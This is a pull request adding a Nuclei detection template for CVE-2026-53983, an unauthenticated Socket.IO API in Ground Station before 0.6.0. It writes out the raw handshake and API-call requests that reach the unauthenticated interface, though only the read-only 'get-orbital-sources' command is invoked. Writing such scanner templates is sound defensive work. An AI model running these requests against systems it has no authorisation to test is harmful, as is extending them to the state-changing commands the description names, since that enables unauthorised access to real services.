### PR TITLE
Add CVE-2026-53983 template

### DIFF
--- a/http/cves/2026/CVE-2026-53983.yaml
+++ b/http/cves/2026/CVE-2026-53983.yaml
@@ -1,0 +1,110 @@
+id: CVE-2026-53983
+
+info:
+  name: Ground Station < 0.6.0 - Unauthenticated Socket.IO API Access
+  author: str4k3r
+  severity: critical
+  description: |
+    Ground Station before 0.6.0 exposes its Socket.IO API without
+    authentication. An unauthenticated client can complete the Engine.IO
+    polling handshake and invoke the `get-orbital-sources` API command. This
+    read-only detector does not invoke SSRF, restore a database, restart a
+    service, or modify application state. Version 0.6.0 requires authentication
+    before dispatching the command.
+  remediation: Upgrade Ground Station to 0.6.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53983
+    - https://github.com/sgoudelis/ground-station/security/advisories/GHSA-mjp8-x6h7-229q
+    - https://github.com/sgoudelis/ground-station/commit/2ecde82a8814cbea18883ce023bf45cbf06172eb
+    - https://github.com/sgoudelis/ground-station
+  classification:
+    cve-id: CVE-2026-53983
+    cwe-id: CWE-306
+    cvss-score: 9.2
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
+  metadata:
+    vendor: sgoudelis
+    product: ground-station
+    technology: python,fastapi,socketio
+    verified: true
+    max-request: 5
+  tags: cve,cve2026,ground-station,socketio,auth-bypass,unauth,missing-auth
+
+flow: http(1) && http(2) && http(3) && http(4) && http(5)
+
+http:
+  - id: handshake
+    raw:
+      - |
+        GET /socket.io/?EIO=4&transport=polling HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - starts_with(body, "0{\"sid\":")
+        condition: and
+        internal: true
+    extractors:
+      - type: regex
+        name: socket_sid
+        part: body
+        group: 1
+        regex:
+          - '"sid":"([^"]+)"'
+        internal: true
+
+  - id: namespace-open
+    raw:
+      - |
+        POST /socket.io/?EIO=4&transport=polling&sid={{socket_sid}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain;charset=UTF-8
+        Content-Length: 2
+
+        40
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+  - id: rpc-call
+    raw:
+      - |
+        POST /socket.io/?EIO=4&transport=polling&sid={{socket_sid}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain;charset=UTF-8
+        Content-Length: 45
+
+        421["api.call",{"cmd":"get-orbital-sources"}]
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+  - id: namespace-result
+    raw:
+      - |
+        GET /socket.io/?EIO=4&transport=polling&sid={{socket_sid}} HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - starts_with(body, "40{\"sid\":")
+        condition: and
+        internal: true
+
+  - id: rpc-result
+    raw:
+      - |
+        GET /socket.io/?EIO=4&transport=polling&sid={{socket_sid}} HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "431[{\"success\":true")
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-53983 in Ground Station. Versions before 0.6.0 expose the Socket.IO API without authentication; 0.6.0 requires authentication before API command dispatch.

## Detection

The template completes the generic Engine.IO polling handshake and invokes only the read-only `get-orbital-sources` command. It matches the successful response from the vulnerable build and does not invoke SSRF, database restore, service restart, or state-changing commands.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-53983
- https://github.com/sgoudelis/ground-station/security/advisories/GHSA-mjp8-x6h7-229q
- https://github.com/sgoudelis/ground-station/commit/2ecde82a8814cbea18883ce023bf45cbf06172eb

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable 0.5.2 detected 3/3; fixed 0.6.0 not detected 3/3. The final template was syntax-validated and quality-checked before submission.